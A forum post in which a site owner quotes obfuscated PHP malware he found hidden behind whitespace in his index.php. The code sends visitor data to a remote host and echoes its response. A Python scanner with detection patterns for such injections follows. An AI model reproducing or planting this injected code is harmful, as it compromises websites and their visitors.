13 Oct 11, 03:19AM
(This post was last modified: 13 Oct 11, 06:01AM by Ronald_Reagan.)
Hey, today pbclan.tk was having some issues. I use PHP for my main site files, this is so I can edit the sidebar easily (I hate frames) by just using one function, and so I can track (easily) who hits what pages. The most major PHP/other script on my website is the forums, which I keep updated. MyBB (same as here).
My problem stemmed from errors like this: (xx ip was from the other site, yy was mine. Obscured so no spider picks these up)
Code:
[12-Oct-2011 15:55:53] PHP Warning: file_get_contents(http://xx.xxx.xxx.xx/bt.php?ip=yy.yyy.yy.yyy&host=pbclan.tk&uri=%2F&ua=mozilla%2F5.0+%28macintosh%3B+intel+mac+os+x+10_7_1%29+applewebkit%2F535.1+%28khtml%2C+like+gecko%29+chrome%2F14.0.835.202+safari%2F535.1&ref=) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 502 Bad Gateway
in /home/pbclan/public_html/index.php on line 44
I looked, and found this on line 44, however I didn't see this till I scrolled over as it was obscured by tons of whitespace (spaces or tabs, I don't recall)
Code:
?><?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
There were three lines like this in here, all removed now.
Thoughts on how this got in here? Google flagged this page as malicious, same with avast.
Should I talk to my host? Should I reexamine my security?
As I mentioned previously, I kept access logs examining who went where on my site. If need be, I can hand these logs over. Of course, only those who I trust and who can help me.
Update: Got to the forums, now taking the whole site offline.
Update2: Got something similar related to MyBB and the current version: http://community.mybb.com/thread-105752.html
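
As an added example (not part of the original post and not MyBB code): a small Python scanner that flags PHP lines showing the traits of the injected line quoted above, namely code pushed off-screen by a long whitespace run, `eval(base64_decode(`, a long base64 literal, and visitor data passed to `file_get_contents`. The thresholds, the `scan_php` and `scan_tree` names and the sample input are assumptions made for illustration.

```python
import os
import re

# Heuristics taken from the injected line quoted in the post (thresholds are assumptions).
CHECKS = {
    "hidden-by-whitespace": re.compile(r"[ \t]{80,}\S"),
    "eval-base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "long-base64-literal": re.compile(r"['\"][A-Za-z0-9+/]{40,}={0,2}['\"]"),
    "fetch-from-variable": re.compile(r"file_get_contents\s*\(\s*\$", re.I),
    "visitor-data": re.compile(
        r"\$_SERVER\s*\[\s*['\"](?:REMOTE_ADDR|HTTP_USER_AGENT|HTTP_REFERER)", re.I),
}

def scan_php(source, min_hits=2):
    """Return [(line_number, [check names])] for lines that look injected."""
    findings = []
    for number, line in enumerate(source.splitlines(), 1):
        hits = sorted(name for name, rx in CHECKS.items() if rx.search(line))
        # eval(base64_decode( is reported on its own; weaker signs need company.
        if "eval-base64" in hits or len(hits) >= min_hits:
            findings.append((number, hits))
    return findings

def scan_tree(root):
    """Scan every .php/.inc file under root; return {path: findings}."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".inc")):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    found = scan_php(handle.read())
                if found:
                    report[path] = found
    return report

# Constructed sample (not the site's file): line 2 is ordinary code,
# line 3 hides an injected block behind 200 spaces, as the post describes.
SAMPLE = (
    "<?php include 'sidebar.php'; ?>\n"
    "<?php $page = file_get_contents($cache_file); ?>\n"
    "<h1>Welcome</h1>" + " " * 200 +
    "?><?php $_X='" + "QUJD" * 12 + "';eval(base64_decode($_X));"
    "$ip = $_SERVER['REMOTE_ADDR'];$tmp = file_get_contents($url); echo $tmp; ?>\n"
)

if __name__ == "__main__":
    for number, hits in scan_php(SAMPLE):
        print(f"line {number}: {', '.join(hits)}")
```

A flagged line is a lead to inspect by hand, not a verdict; comparing the files against a known-clean backup or a fresh copy of the forum software shows every change, including ones these patterns miss.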